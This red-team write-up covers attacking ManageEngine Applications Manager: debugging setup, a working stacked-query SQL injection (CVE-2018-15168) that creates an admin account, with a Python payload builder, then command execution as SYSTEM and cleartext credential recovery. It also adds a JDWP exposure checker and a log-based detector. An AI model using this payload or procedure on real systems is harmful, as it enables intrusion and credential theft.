Zoho ManageEngine Applications Manager: From SQLi to RCE & More
In late 2019 I took part in a Red-Blue team exercise, a rehearsal of real-world "attack and defense", on the Red side. It took our Red team very little time to find and exploit weaknesses in the victim's systems. After a couple of days of recon, I kept an eye on an application installed on the victim's server: ManageEngine Applications Manager (MEAM), listening on port 9090. Let's take a quick look at MEAM:
MEAM is described as a very powerful application, one of Zoho's enterprise-class products (see the product description). From that description I concluded that if I could take control of MEAM, I would be able to pivot into the services it monitors. The exercise ended, and afterwards I did something interesting with MEAM. So let's dig into MEAM and see what you can do with it.
⚠️ This article is not a hacking tutorial!!!
0x01 — Setup debug environment
You can download the installer from:
- https://www.manageengine.com/products/applications_manager/download.html (latest version)
- http://archives.manageengine.com/applications_manager/ (older versions)
I chose MEAM build 13100 on Windows Server 2012 R2, with IntelliJ IDEA as the debugger. After running the installer it takes a few minutes to start up completely. By default the app listens on port 9090 over plain HTTP, and the default login is admin/admin.
Step 1. Copy all .jar files from the MEAM installation folder into a new folder. I named it meam_13100_jars.
Step 2. Create a new Java project in IntelliJ. I named it meam_13100. Open Project Structure (Ctrl + Alt + Shift + S) and add meam_13100_jars to the project's Libraries.
Step 3. Open "AppManager_path\working\conf\wrapper.conf" and uncomment the following rows to enable JPDA debugging.
Step 4. Restart the service by running "AppManager_path\shutdownApplicationsManager.bat" and then "AppManager_path\startApplicationsManager.bat". The debug port is now open.
Step 5. In the Run/Debug Configurations of project meam_13100, add a new Remote configuration named remote_meam13100 that attaches to the remote JVM listening on port 5005.
Save and start the debug session. Done!
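Two things are worth checking before leaving a debug port on a server you do not own outright: that the JDWP options actually took effect, and where the listener is bound. A JDWP listener started with server=y accepts any debugger that connects, with no authentication, and on JDK 8 an address given as a bare port binds every interface, which turns the debug port into a second remote code execution path. The script below is an added example, not code from the original post or from ManageEngine. The wrapper.conf lines in it are constructed: they use the Java Service Wrapper property syntax (wrapper.java.additional.N=...), which is an assumption about MEAM's file, and the property indexes are placeholders, not the rows the post refers to.

```python
import re

# Constructed sample of a Java Service Wrapper config with the JDWP rows still
# commented out. Property indexes are placeholders, not MEAM's real ones.
SAMPLE_WRAPPER_CONF = """\
wrapper.java.command=../jre/bin/java
#wrapper.java.additional.40=-Xdebug
#wrapper.java.additional.41=-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005
wrapper.java.additional.42=-Dfile.encoding=UTF-8
"""

# Both spellings of the JDWP agent option: the old -Xrunjdwp: and -agentlib:jdwp=
JDWP_RE = re.compile(r"-(?:Xrunjdwp:|agentlib:jdwp=)(?P<opts>\S+)")


def enable_jdwp(conf_text: str) -> str:
    """Step 3 of the setup: strip the leading '#' from the debug rows."""
    out = []
    for line in conf_text.splitlines():
        if line.startswith("#") and ("jdwp" in line or "-Xdebug" in line):
            out.append(line[1:])
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def jdwp_settings(conf_text: str) -> list:
    """Parse every active (uncommented) JDWP option line into a dict."""
    found = []
    for line in conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # the wrapper ignores commented rows, so we do too
        m = JDWP_RE.search(stripped)
        if not m:
            continue
        pairs = (kv.split("=", 1) for kv in m.group("opts").split(",") if "=" in kv)
        found.append({k: v for k, v in pairs})
    return found


def exposure(opts: dict) -> str:
    """Classify one option set: 'off' (no listener), 'loopback' or 'network'."""
    if opts.get("server") != "y":
        return "off"  # client mode: the JVM dials out, nothing listens
    address = opts.get("address", "")
    host = address.rsplit(":", 1)[0] if ":" in address else ""
    if host in ("127.0.0.1", "localhost"):
        return "loopback"
    return "network"  # bare port: JDK 8 binds all interfaces


def bind_loopback(conf_text: str) -> str:
    """Rewrite a bare address=PORT into address=127.0.0.1:PORT on JDWP rows."""
    return re.sub(r"(address=)(\d+)(?=[,\s]|$)", r"\g<1>127.0.0.1:\2", conf_text, flags=re.M)


if __name__ == "__main__":
    enabled = enable_jdwp(SAMPLE_WRAPPER_CONF)
    for opts in jdwp_settings(enabled):
        print(opts, "->", exposure(opts))
    for opts in jdwp_settings(bind_loopback(enabled)):
        print(opts, "->", exposure(opts))
```

Run it against the real wrapper.conf instead of the sample to see whether the port you just opened is reachable from the network; in a lab that is a convenience, on a shared host it is a finding. Remove the rows again when the analysis is finished.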
0x02 — From SQLi to RCE
A trivial search for MEAM confirms that there is a whole series of critical vulnerabilities out there.
There are a lot of SQLi bugs with public exploit payloads (and that's not all). Don't be surprised that so many SQLi CVEs are rated as code execution: MEAM ships command execution as a feature of its admin panel, so any SQLi that yields an admin account yields RCE.
For demonstration I chose CVE-2018-15168. The injection point is /editDisplaynames.do?method=editDisplaynames&resids=[SQLi], and it makes the exercise easier because it supports stacked queries.
Let's get started.
Step 1. Use the SQLi to create a new account with admin privileges.
21232f297a57a5a743894a0e4a801fc3 is the unsalted MD5 hash of admin (I took it from the password table in my debug env). The $$...$$ dollar quoting is PostgreSQL string-literal syntax, so the payload needs no single quotes. The payload is:
/editDisplaynames.do?method=editDisplaynames&resids=1);insert+into+AM_UserPasswordTable+(userid,username,password)+values+($$1000222$$,$$super_admin$$,$$21232f297a57a5a743894a0e4a801fc3$$);insert+into+Am_UserGroupTable+(username,groupname)+values+($$super_admin$$,$$ADMIN$$);--+
Step 2. Log in as super_admin/admin and open http://localhost:9090/showTile.do?TileName=.ExecProg. Yes! There is a function inside the administration panel that executes commands on the server as NT AUTHORITY\SYSTEM. Through my debug env I found some folders (blog, logs, ...) from which I could retrieve my command's output. To execute code through this function, create an "Execute Program" action, press the Execute button, and read the output to gather information.
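The two steps above are one procedure, and both sides of the exercise can be expressed in a few lines. The following Python is an added example, not code from the original post or from ManageEngine: it builds the stacked-query payload for the resids parameter from a chosen username and password (so the MD5 and the PostgreSQL dollar quoting are not hand-typed), produces the URL a GET request would carry, and then runs a detection pass over constructed access-log lines in common log format. The log format, the table of hypothetical requests and the userid value are assumptions; the table names, the parameter and the tile name are the ones on the page. Detection keys on the expected shape of resids (a comma-separated list of numeric ids) rather than on a signature for this one payload, so a re-encoded or reworded injection is still caught, and any hit on the Execute Program tile is flagged separately.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlencode, urlsplit

INJECTION_PATH = "/editDisplaynames.do"
EXEC_TILE = ".ExecProg"


def md5_hex(password: str) -> str:
    """MEAM stores passwords as unsalted MD5 hex digests (admin -> 21232f29...)."""
    return hashlib.md5(password.encode()).hexdigest()


def pg_dollar(literal: str) -> str:
    """PostgreSQL dollar quoting: a string literal without single quotes."""
    if "$$" in literal:
        raise ValueError("literal may not contain $$")
    return f"$${literal}$$"


def build_resids(username: str, password: str, userid: int = 1000222) -> str:
    """Value for resids: close the original query's parenthesis, then stack an
    INSERT that creates the account and one that puts it in the ADMIN group.
    userid is an assumption (the page's value); any unused id would do."""
    return ";".join([
        "1)",
        "insert into AM_UserPasswordTable (userid,username,password) values "
        f"({pg_dollar(str(userid))},{pg_dollar(username)},{pg_dollar(md5_hex(password))})",
        "insert into Am_UserGroupTable (username,groupname) values "
        f"({pg_dollar(username)},{pg_dollar('ADMIN')})",
        "-- ",  # comment out whatever the application appends after resids
    ])


def build_url(base: str, resids: str) -> str:
    """Full GET URL; urlencode percent-encodes ( ) ; $ and turns spaces into +."""
    return base + INJECTION_PATH + "?" + urlencode(
        {"method": "editDisplaynames", "resids": resids})


# Blue-team side: what a legitimate resids value looks like, and how to pull the
# request target out of a common-log-format line.
RESIDS_OK = re.compile(r"^\d+(?:,\d+)*$")
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/\d\.\d"')


def flag_requests(log_lines) -> list:
    """Return (reason, request-target) pairs worth alerting on: a resids that is
    not a plain id list, or any request for the Execute Program tile."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        url = urlsplit(target)
        params = parse_qs(url.query)  # decodes %xx and + for us
        if url.path.endswith(INJECTION_PATH):
            for value in params.get("resids", []):
                if not RESIDS_OK.match(value):
                    hits.append(("sqli-shaped resids", target))
        if url.path.endswith("/showTile.do") and EXEC_TILE in params.get("TileName", []):
            hits.append(("execute-program tile", target))
    return hits


# Constructed sample log: one normal edit, the injection built above, and the
# follow-up visit to the Execute Program tile. Not a real MEAM log.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Dec/2019:10:01:02 +0000] "GET /editDisplaynames.do'
    '?method=editDisplaynames&resids=10000042 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Dec/2019:10:01:40 +0000] "GET '
    + build_url("", build_resids("super_admin", "admin")) + ' HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Dec/2019:10:03:11 +0000] "GET /showTile.do?TileName=.ExecProg'
    ' HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    print(build_url("http://localhost:9090", build_resids("super_admin", "admin")))
    for reason, target in flag_requests(SAMPLE_ACCESS_LOG):
        print(reason, "->", target)
```

Sending the generated URL to a patched build does nothing useful; the point of the builder is to show how little the attacker has to get right once stacked queries are available, and the point of the detector is that the parameter's legitimate shape is a far better alert than the literal string from a public exploit.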
0x03 — Gather credentials
This is the most interesting part to me. When you are on the Red team you want to dig as deep as possible into the victim's systems. To do that you need at least some information: IP addresses, and login details such as usernames and passwords. And MEAM has everything you need.
As mentioned above, MEAM is a very powerful application that helps sysadmins monitor their services, servers, applications and so on. Some examples from editing a managed object:
You see? It provides everything we need. I'll prove it now.
The Edit Monitor function doesn't display the services' passwords. But MEAM has to store them in recoverable form, because it needs them to authenticate when it runs its monitoring jobs. Any monitoring product that authenticates to its targets is in the same position, so the cleartext is available to anyone who can run code on the monitoring server. With my debug env I quickly found an easy way to get the cleartext passwords.
When I press the Test Credential button, the client sends a POST request to the server, which calls the testCredential action, testCredentialForConfMonitors method:
Tracing it with my debug env, I step into the method and set a breakpoint on the following line:
And when the breakpoint is hit, I get the cleartext credentials at the moment the MEAM server uses them to test the connection to the service.
0x04 — Conclusions
During the exercise I had to go a very hard way to extract the credentials of the services managed by the victim's MEAM. After it ended I decided to learn more about MEAM, and finally I found something useful. So I highly recommend setting up a debug env to explore further. For defenders the takeaway is twofold: patch MEAM promptly, because many of its SQLi bugs translate directly into command execution through the built-in Execute Program function, and give the accounts MEAM monitors with the least privilege their checks require, since whoever compromises the monitoring server inherits every one of them.